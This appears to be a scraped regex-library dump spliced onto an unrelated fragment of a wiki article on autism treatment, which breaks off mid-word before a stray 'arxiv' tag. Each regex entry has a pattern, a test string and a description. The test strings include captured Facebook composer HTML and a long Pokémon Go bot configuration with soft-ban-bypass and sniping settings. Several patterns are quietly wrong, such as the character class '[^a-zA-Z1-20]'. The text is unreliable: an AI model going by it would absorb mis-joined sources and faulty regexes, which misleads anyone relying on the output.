10.1007/s10803-007-0402-4 }} </ref> Treatment approaches have little empirical support in [[Quality of life|quality-of-life]] contexts, and many programs focus on success measures that lack predictive validity and real-world relevance.<ref name=Burgess/> Scientific evidence appears to matter less to service providers than program marketing, training availability, and parent requests.<ref>{{cite journal | vauthors = Stahmer AC, Collings NM, Palinkas LA | title = Early intervention practices for children with autism: descriptions from community providers | journal = Focus Autism Other Dev Disabl | volume = 20 | issue = 2 | pages = 66–79 | year = 2005 | pmid = 16467905 | pmc = 1350798 | doi = 10.1177/10883576050200020301 }}</ref> Some alternative treatments may place the child at risk. A 2008 study found that compared to their peers, autistic boys have significantly thinner bones if on [[casein-free diet]]s;<ref>{{cite journal | vauthors = Hediger ML, England LJ, Molloy CA, Yu KF, Manning-Courtney P, Mills JL | title = Reduced bone cortical thickness in boys with autism or autism spectrum disorder | journal = J Autism Dev Disord | volume = 38 | issue = 5 | pages = 848–56 | year = 2008 | pmid = 17879151 | doi = 10.1007/s10803-007-0453-6 | laysummary = http://www.nih.gov/news/health/jan2008/nichd-29.htm | laydate = 29 January 2008 | laysource = NIH News }} {{Wayback|df=yes|url=http://www.nih.gov/news/health/jan2008/nichd-29.htm|date =20131001111904}}</ref> in 2005, botche
arxiv
2015-10-27T15:08:28.000Z
((?!\]+)(?!\[+).)*
[[ some text]] [[[ some text]]]
Regex to select text withing square brackets.
2014-06-04T15:19:11.000Z
<br\ ?\/?>(.*?)<br\ ?\/?>
00:28:52<br>Roy Ayers<br>Love Will Bring Us Back Togeth
match text between two <br/> tags.
2014-07-25T22:51:02.000Z
(me)(?!([^<]+)?>)
I have ever been prone to seek adventure and to investigate and experiment where <span class='me'>wiser men</span> would have left well enough alone.
Match text (not within html tag)
2015-05-12T12:38:40.000Z
Parses variables for Javascript.
(var\s+(\w[\w\-\_]*)\s*(?:=\s*(\d+|['"][\w\W]+['"]))?;?)
var stuff = 1; var string = "dsa"; var lone;
JS Variable Parser
2016-06-22T20:39:08.000Z
match traveloka accomodation url
https?:\/\/(?:www\.)?traveloka\.com\/en-id\/((?!.*activities.*).*)
traveloka accomodation url
2023-11-18T12:10:33.000Z
[?].*[=].+[/].+$
glossary.ua/catalog/ukhod_za_litsom/?PAGEN_1=2/4556 glossary.ua/catalog/ukhod_za_litsom/?PAGEN_1=2 glossary.ua/catalog/ukhod_za_litsom/?PAGEN_1=2/ glossary.ua/catalog//ukhod_za_litsom/? [?]$ [?].*[/].
//
2017-09-25T09:14:15.000Z
Finds valid phone numbers, including dashes Valid: 223-444-5555 Invalid: 123-456-7890 // Area code cannot start with a 1 2234445555
^[2-9]\d{2}-\d{3}-\d{4}$
Phone number with dashes
2017-06-29T20:54:53.000Z
^[ \t]*(?>etaLearnW_enabled)[ \t]?=[ \t]?(?<etaLearnW_enabled>[01])[ \t]*[ \t]*;?
%% LEARNING RATES and other HYPER PARAMETERS lambdaInfomaxTerm = 1; %coeff before logdetT'T, 0 or 1 etaLearnW_enabled = 1; etaLearnW_enabled = 1; % etaLearnW_enabled = 1; %etaLearnW_enabled = 1; etaLearnW = 1E-4; %lambdaRidgeW = 3e-3; %going down, crashes on epoch 3888 lambdaRidgeW = 3e-2; etaLearnK_enabled = 1; etaLearnK = 4E-5; %PostSlim: %lambdaRidgeK = 3e-5; %too weak (going down fast) %lambdaRidgeK = 3e-4; %too weak (fails at #14628) lambdaRidgeK = 1e-3;
etaLearnW_enabled
2017-08-12T16:21:12.000Z
div id=^(.*)><
<div style="outline: 1px solid blue;" class="_36bx _4-u2 _4-u8" data-testid="react-composer-root" id="u_0_18" data-reactid=".4"><div class="_4d6h _4p1p _4-u3 _57d8" data-reactid=".4.0"><div class="clearfix" data-reactid=".4.0.0"><div class="_ohe lfloat" data-reactid=".4.0.0.$left"><div data-reactid=".4.0.0.$left.0"><a class="_5qtm _5qtn" role="tab" aria-selected="true" label="Statut" icon="[object Object]" data-testid="status-attachment-selector" selected="" href="#" data-reactid=".4.0.0.$left.0.0"><span class="_4-fs" data-reactid=".4.0.0.$left.0.0.0"><i class="_5qto img sp_QiW5hJ5PiNH sx_49d0b1" data-reactid=".4.0.0.$left.0.0.0.0"></i><span class="_5qtp" data-reactid=".4.0.0.$left.0.0.0.1">Statut</span><span class="_5qtq" data-reactid=".4.0.0.$left.0.0.0.2"></span></span></a><a class="_5qtm" role="tab" aria-selected="false" label="Photo/vidéo" icon="[object Object]" data-testid="media-attachment-selector" href="#" data-reactid=".4.0.0.$left.0.1"><span class="_4-fs" data-reactid=".4.0.0.$left.0.1.0"><i class="_5qto img sp_QiW5hJ5PiNH sx_33bc4c" data-reactid=".4.0.0.$left.0.1.0.0"></i><span class="_5qtp" data-reactid=".4.0.0.$left.0.1.0.1">Photo/vidéo</span><span class="_5qtq" data-reactid=".4.0.0.$left.0.1.0.2"></span></span></a><a class="_5qtm" role="tab" aria-selected="false" label="Offre, évènement +" icon="[object Object]" href="#" data-reactid=".4.0.0.$left.0.2"><span class="_4-fs" data-reactid=".4.0.0.$left.0.2.0"><i class="_5qto img sp_BaO-9AbAyUH sx_98a590" data-reactid=".4.0.0.$left.0.2.0.0"></i><span class="_5qtp" data-reactid=".4.0.0.$left.0.2.0.1">Offre, évènement +</span><span class="_5qtq" data-reactid=".4.0.0.$left.0.2.0.2"></span></span></a></div></div><div class="_ohf rfloat" data-reactid=".4.0.0.$right"><div data-reactid=".4.0.0.$right.0"><img class="_4d6i img" src="https://static.xx.fbcdn.net/rsrc.php/v2/yb/r/GsNJNwuI-UM.gif" data-reactid=".4.0.0.$right.0.0" height="11" width="16"><span data-reactid=".4.0.0.$right.0.1"><span class="hidden_elem _5gvy img _55ym _55yn _55yo _5d9-" aria-label="Chargement..." aria-busy="true" data-reactid=".4.0.0.$right.0.1.0"></span><span class="_6vh _4w4v" data-reactid=".4.0.0.$right.0.1.1"><span class="hidden_elem _3-8_ img _55ym _55yn _55yo _5d9-" aria-label="Chargement..." aria-busy="true" data-reactid=".4.0.0.$right.0.1.1.0"></span><span aria-label="Vous publiez en tant que Mega drole" data-hover="tooltip" data-reactid=".4.0.0.$right.0.1.1.1"><a aria-haspopup="true" aria-owns="js_i" style="max-width:200px;" class="_4z8- _55pi _2agf _4z8- _55pi _4jy0 _4jy3 _517h _51sy _59pe _42ft" href="#" type="button" data-reactid=".4.0.0.$right.0.1.1.1.0"><span class="_55pe" data-reactid=".4.0.0.$right.0.1.1.1.0.1"><img src="https://fbcdn-profile-a.akamaihd.net/hprofile-ak-xft1/v/t1.0-1/p32x32/1453483_555123727915438_1286693911_n.png?oh=e520e64208f4829f8307cfadce0812e8&amp;oe=56C302F3&amp;__gda__=1456503974_001e2d51c40bce6e62c31d80438f25a9" class="img" data-reactid=".4.0.0.$right.0.1.1.1.0.1.0" height="16" width="16"><span data-reactid=".4.0.0.$right.0.1.1.1.0.1.1"></span></span><i alt="" class="_3-99 img sp_5_FvgObiY-v sx_593e27" data-reactid=".4.0.0.$right.0.1.1.1.0.2"></i></a></span></span></span></div></div></div></div><div class="_4zoz _4-u3" data-reactid=".4.1"><div id="js_k" data-reactid=".4.1.0"><div class="_1y-n" data-reactid=".4.1.0.0"><div class="_1y-o" data-reactid=".4.1.0.0.0"><span class="_1y-p" data-reactid=".4.1.0.0.0.0">Faites glisser un lien, des photos ou des vidéos ici</span><span class="_1y-q" data-reactid=".4.1.0.0.0.1">Déposer le lien</span><span class="_1y-r" data-reactid=".4.1.0.0.0.2">Déposer une photo/vidéo</span><span class="_1y-s" data-reactid=".4.1.0.0.0.3">Déposez les photos</span></div></div><div class="clearfix" data-reactid=".4.1.0.1"><div class="_42k7 _4bl7" data-reactid=".4.1.0.1.$0"><div class="_3hvt" data-reactid=".4.1.0.1.$0.0"><img class="_bth img" src="https://fbcdn-profile-a.akamaihd.net/hprofile-ak-xft1/v/t1.0-1/p40x40/1453483_555123727915438_1286693911_n.png?oh=531ded5fcd4f71ed763f8c6d683325a5&amp;oe=568FDCAF&amp;__gda__=1456525306_54b153b26c9b3c2c6a3ac05ebc0242d6" data-reactid=".4.1.0.1.$0.0.0" height="40" width="40"></div></div><div class="_4bl9" data-reactid=".4.1.0.1.$1"><div class="_1mwp _1mwq _5bu_ _5yk1" data-reactid=".4.1.0.1.$1.0"><div class="_5yk2" tabindex="-2" data-reactid=".4.1.0.1.$1.0.0"><div class="_5yw9" data-reactid=".4.1.0.1.$1.0.0.0"><div class="_5ywb _5ywc" data-reactid=".4.1.0.1.$1.0.0.0.0"><div class="_3br6" data-reactid=".4.1.0.1.$1.0.0.0.0.0">Écrivez quelque chose...</div></div><div class="_5ywa" data-reactid=".4.1.0.1.$1.0.0.0.$editor0"><div aria-autocomplete="list" aria-expanded="false" aria-haspopup="false" aria-owns="js_j" class="_54-z" role="combobox" spellcheck="true" title="Écrivez quelque chose..." data-reactid=".4.1.0.1.$1.0.0.0.$editor0.0" contenteditable="true"><div data-contents="true" data-reactid=".4.1.0.1.$1.0.0.0.$editor0.0.0"><div data-block="true" data-offset-key="cioa-0-0" class="_209g _2vxa" data-reactid=".4.1.0.1.$1.0.0.0.$editor0.0.0.$cioa"><span data-offset-key="cioa-0-0" data-reactid=".4.1.0.1.$1.0.0.0.$editor0.0.0.$cioa.0:$cioa-0-0"><br data-reactid=".4.1.0.1.$1.0.0.0.$editor0.0.0.$cioa.0:$cioa-0-0.0"></span></div></div></div></div></div></div></div></div></div><noscript data-reactid=".4.1.0.2"></noscript><div class="_3qg0" data-reactid=".4.1.0.4"></div><div data-reactid=".4.1.0.7"><div class="_5f24" data-reactid=".4.1.0.7.0"><noscript data-reactid=".4.1.0.7.0.1"></noscript><noscript data-reactid=".4.1.0.7.0.2"></noscript><noscript data-reactid=".4.1.0.7.0.3"></noscript></div><div class="_2dck _4-u3 _57d8" data-reactid=".4.1.0.7.1"><div class="clearfix" data-reactid=".4.1.0.7.1.0"><div class="_ohe lfloat" data-reactid=".4.1.0.7.1.0.$left"><div class="_47gt" data-reactid=".4.1.0.7.1.0.$left.0"><div class="_3xem _3xen" data-reactid=".4.1.0.7.1.0.$left.0.0"><div class="_m _6a" data-reactid=".4.1.0.7.1.0.$left.0.0.0"><a rel="ignore" data-hover="tooltip" aria-label="Ajoutez des photos à votre publication" class="_3xen _50hp" data-reactid=".4.1.0.7.1.0.$left.0.0.0.0"><span class="accessible_elem" data-reactid=".4.1.0.7.1.0.$left.0.0.0.0.0">Ajoutez des photos</span><div class="_3jk"><input id="js_l" aria-label="Ajoutez des photos à votre publication" multiple="" name="composer_photo" role="button" tabindex="0" class="_n _5f0v" data-reactid=".4.1.0.7.1.0.$left.0.0.0.1" type="file"></div></a></div></div><a data-hover="tooltip" class="_3xem" aria-label="Ajoutez ce que vous faites ou votre humeur" tabindex="0" role="button" data-reactid=".4.1.0.7.1.0.$left.0.2"><span class="accessible_elem" data-reactid=".4.1.0.7.1.0.$left.0.2.0">Ajoutez ce que vous faites ou votre humeur</span><div class="_3xen _3vk5" data-reactid=".4.1.0.7.1.0.$left.0.2.1"></div></a><a data-hover="tooltip" class="_3xem" aria-label="Ajoutez un lieu à votre publication" tabindex="0" role="button" data-reactid=".4.1.0.7.1.0.$left.0.3"><span class="accessible_elem" data-reactid=".4.1.0.7.1.0.$left.0.3.0">Identifier un lieu</span><div class="_3xen _52xx" data-reactid=".4.1.0.7.1.0.$left.0.3.1"></div><noscript data-reactid=".4.1.0.7.1.0.$left.0.3.2"></noscript></a><a data-hover="tooltip" class="_3xem" aria-label="Définir la date et l’heure de votre publication" tabindex="0" role="button" data-reactid=".4.1.0.7.1.0.$left.0.4"><span class="accessible_elem" data-reactid=".4.1.0.7.1.0.$left.0.4.0">Définir la date et l’heure de votre publication</span><div class="_3xen _2czx" data-reactid=".4.1.0.7.1.0.$left.0.4.1"></div></a></div></div><div class="_ohf rfloat" data-reactid=".4.1.0.7.1.0.$right"><div class="_2ph- _4-u3" data-reactid=".4.1.0.7.1.0.$right.0"><button aria-label="Mettez votre publication en avant pour atteindre plus de monde" data-hover="tooltip" data-testid="boosted_post_button_with_id" class="_4dyi _4jy0 _4jy3 _517h _51sy _42ft" type="submit" value="1" data-reactid=".4.1.0.7.1.0.$right.0.0:$boosted_post_button"><span class="_4m40" data-reactid=".4.1.0.7.1.0.$right.0.0:$boosted_post_button.1">Mettre en avant</span></button><div class="_51xa" data-reactid=".4.1.0.7.1.0.$right.0.2"><button class="_1mf7 _4jy0 _4jy3 _4jy1 _51sy selected _42ft" data-testid="react-composer-post-button" type="submit" value="1" data-reactid=".4.1.0.7.1.0.$right.0.2.0"><span data-reactid=".4.1.0.7.1.0.$right.0.2.0.1">Publier</span></button><div class="_lde uiPopover _6a _6b" data-reactid=".4.1.0.7.1.0.$right.0.2.1"><button role="button" class="_p _4jy0 _4jy3 _4jy1 _51sy selected _42ft" type="submit" value="1" data-reactid=".4.1.0.7.1.0.$right.0.2.1.$/=10"><i class="img sp_5_FvgObiY-v sx_a9190d" data-reactid=".4.1.0.7.1.0.$right.0.2.1.$/=10.2"></i></button></div></div></div></div></div></div></div></div><noscript data-reactid=".4.1.1"></noscript><noscript data-reactid=".4.1.2"></noscript><noscript data-reactid=".4.1.$QUESTION"></noscript><noscript data-reactid=".4.1.$QANDA"></noscript></div></div>
id
2015-10-16T16:36:19.000Z
Match numerical value of a JSON key. Numbers only 3-9
"WalkingSpeedInKilometerPerHour":\ ([^a-zA-Z1-20]).[^a-zA-z1-9]
{ "TranslationLanguageCode": "en", "AutoUpdate": false, "TransferConfigAndAuthOnUpdate": true, "UseWebsocket": false, "WebSocketPort": 14251, "StartupWelcomeDelay": false, "UseTelegramAPI": false, "TelegramAPIKey": null, "AmountOfPokemonToDisplayOnStart": 5, "DetailedCountsBeforeRecycling": true, "MaxBerriesToUsePerPokemon": 5, "CatchPokemon": true, "AutomaticallyLevelUpPokemon": false, "OnlyUpgradeFavorites": true, "UseLevelUpList": true, "AmountOfTimesToUpgradeLoop": 5, "GetMinStarDustForLevelUp": 15000, "LevelUpByCPorIv": "iv", "UpgradePokemonCpMinimum": 1000.0, "UpgradePokemonIvMinimum": 95.0, "UpgradePokemonMinimumStatsOperator": "and", "DisableHumanWalking": false, "DefaultLatitude": 40.7711329, "DefaultLongitude": -73.9741874, "WalkingSpeedInKilometerPerHour": 9.0, "MaxSpawnLocationOffset": 40, "FastSoftBanBypass": false, "DelayBetweenPlayerActions": 2500, "DelayBetweenPokemonCatch": 5000, "DumpPokemonStats": false, "EvolveAboveIvValue": 75.0, "EvolveAllPokemonAboveIv": false, "EvolveAllPokemonWithEnoughCandy": false, "EvolveKeptPokemonsAtStorageUsagePercentage": 15.0, "KeepPokemonsThatCanEvolve": true, "KeepMinCp": 1800, "KeepMinIvPercentage": 95.0, "KeepMinLvl": 10, "KeepMinOperator": "and", "UseKeepMinLvl": false, "PrioritizeIvOverCp": false, "KeepMinDuplicatePokemon": 0, "UseGpxPathing": false, "GpxFile": "sanfran.gpx", "VerboseRecycling": false, "RecycleInventoryAtUsagePercentage": 90.0, "RandomizeRecycle": false, "RandomRecycleValue": 5, "DelayBetweenRecycleActions": false, "UseEggIncubators": true, "minEggKmForLimitedIncubators": 10, "UseLuckyEggConstantly": false, "UseLuckyEggsMinPokemonAmount": 75, "UseLuckyEggsWhileEvolving": false, "UseIncenseConstantly": true, "UseBerriesMinCp": 1000, "UseBerriesMinIv": 90.0, "UseBerriesBelowCatchProbability": 0.2, "UseBerriesOperator": "and", "UseSnipeLocationServer": true, "SnipeLocationServer": "localhost", "SnipeLocationServerPort": 16969, "GetSniperInfoFromPokezz": false, "GetOnlyVerifiedSniperInfoFromPokezz": false, "GetSniperInfoFromPokeSnipers": false, "GetSniperInfoFromPokeWatchers": false, "SnipeWithSkiplagged": true, "MinPokeballsToSnipe": 5, "MinPokeballsWhileSnipe": 0, "MinDelayBetweenSnipes": 9000, "SnipingScanOffset": 0.013, "SnipeAtPokestops": true, "SnipeIgnoreUnknownIv": false, "UseTransferIvForSnipe": false, "SnipePokemonNotInPokedex": true, "RenamePokemon": false, "RenameOnlyAboveIv": false, "RenameTemplate": "{1}_{0}", "MaxPokeballsPerPokemon": 6, "MaxTravelDistanceInMeters": 5000, "TotalAmountOfPokeballsToKeep": 120, "TotalAmountOfPotionsToKeep": 80, "TotalAmountOfRevivesToKeep": 60, "TotalAmountOfBerriesToKeep": 50, "UseGreatBallAboveCp": 1000, "UseUltraBallAboveCp": 1250, "UseMasterBallAboveCp": 1500, "UseGreatBallAboveIv": 85.0, "UseUltraBallAboveIv": 95.0, "UseGreatBallBelowCatchProbability": 0.3, "UseUltraBallBelowCatchProbability": 0.2, "UseMasterBallBelowCatchProbability": 0.05, "EnableHumanizedThrows": false, "NiceThrowChance": 40, "GreatThrowChance": 30, "ExcellentThrowChance": 10, "CurveThrowChance": 90, "ForceGreatThrowOverIv": 90.0, "ForceExcellentThrowOverIv": 95.0, "ForceGreatThrowOverCp": 1000, "ForceExcellentThrowOverCp": 1500, "TransferWeakPokemon": false, "TransferDuplicatePokemon": true, "TransferDuplicatePokemonOnCapture": true, "FavoriteMinIvPercentage": 95.0, "AutoFavoritePokemon": false, "UsePokemonToNotCatchFilter": true, "UsePokemonSniperFilterOnly": false, "ItemRecycleFilter": [ { "Key": "itemUnknown", "Value": 10 }, { "Key": "itemPokeBall", "Value": 10 }, { "Key": "itemGreatBall", "Value": 20 }, { "Key": "itemUltraBall", "Value": 50 }, { "Key": "itemMasterBall", "Value": 75 }, { "Key": "itemPotion", "Value": 0 }, { "Key": "itemSuperPotion", "Value": 5 }, { "Key": "itemHyperPotion", "Value": 25 }, { "Key": "itemMaxPotion", "Value": 25 }, { "Key": "itemRevive", "Value": 10 }, { "Key": "itemMaxRevive", "Value": 25 }, { "Key": "itemLuckyEgg", "Value": 50 }, { "Key": "itemIncenseOrdinary", "Value": 10 }, { "Key": "itemIncenseSpicy", "Value": 25 }, { "Key": "itemIncenseCool", "Value": 25 }, { "Key": "itemIncenseFloral", "Value": 25 }, { "Key": "itemTroyDisk", "Value": 100 }, { "Key": "itemXAttack", "Value": 100 }, { "Key": "itemXDefense", "Value": 100 }, { "Key": "itemXMiracle", "Value": 100 }, { "Key": "itemRazzBerry", "Value": 10 }, { "Key": "itemBlukBerry", "Value": 10 }, { "Key": "itemNanabBerry", "Value": 10 }, { "Key": "itemWeparBerry", "Value": 10 }, { "Key": "itemPinapBerry", "Value": 10 }, { "Key": "itemSpecialCamera", "Value": 100 }, { "Key": "itemIncubatorBasicUnlimited", "Value": 100 }, { "Key": "itemIncubatorBasic", "Value": 100 }, { "Key": "itemPokemonStorageUpgrade", "Value": 100 }, { "Key": "itemItemStorageUpgrade", "Value": 100 } ], "PokemonsNotToTransfer": [ "mewtwo", "mew" ], "PokemonsToEvolve": [ "caterpie", "weedle", "pidgey", "rattata" ], "PokemonsToLevelUp": [ "snorlax", "dragonite", "vaporeon", "gyarados", "flareon", "jolteon" ], "PokemonsToIgnore": [ "mewtwo", "mew" ], "PokemonsTransferFilter": { "Pidgeotto": { "KeepMinCp": 3500, "KeepMinLvl": 41, "UseKeepMinLvl": true, "KeepMinIvPercentage": 101.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Raticate": { "KeepMinCp": 3500, "KeepMinLvl": 41, "UseKeepMinLvl": true, "KeepMinIvPercentage": 101.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Kakuna": { "KeepMinCp": 3500, "KeepMinLvl": 41, "UseKeepMinLvl": true, "KeepMinIvPercentage": 101.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Metapod": { "KeepMinCp": 3500, "KeepMinLvl": 41, "UseKeepMinLvl": true, "KeepMinIvPercentage": 101.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Dratini": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Eevee": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Vaporeon": { "KeepMinCp": 1, "KeepMinLvl": 20, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Flareon": { "KeepMinCp": 1, "KeepMinLvl": 20, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Exeggcute": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Exeggutor": { "KeepMinCp": 1, "KeepMinLvl": 20, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Growlithe": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Arcanine": { "KeepMinCp": 1, "KeepMinLvl": 20, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Snorlax": { "KeepMinCp": 1, "KeepMinLvl": 20, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "and" }, "Dragonite": { "KeepMinCp": 1, "KeepMinLvl": 20, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "and" }, "Bulbasaur": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Ivysaur": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Venusaur": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Charmander": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Charmeleon": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Charizard": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Squirtle": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Wartortle": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Blastoise": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Butterfree": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Beedrill": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Pidgeot": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Fearow": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Ekans": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Arbok": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Pikachu": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Raichu": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "NidoranFemale": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "NidoranMale": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Spearow": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Sandshrew": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Sandslash": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Nidorina": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Nidoqueen": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Nidorino": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Nidoking": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Clefairy": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Clefable": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Vulpix": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Ninetales": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Jigglypuff": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Wigglytuff": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Golbat": { "KeepMinCp": 1, 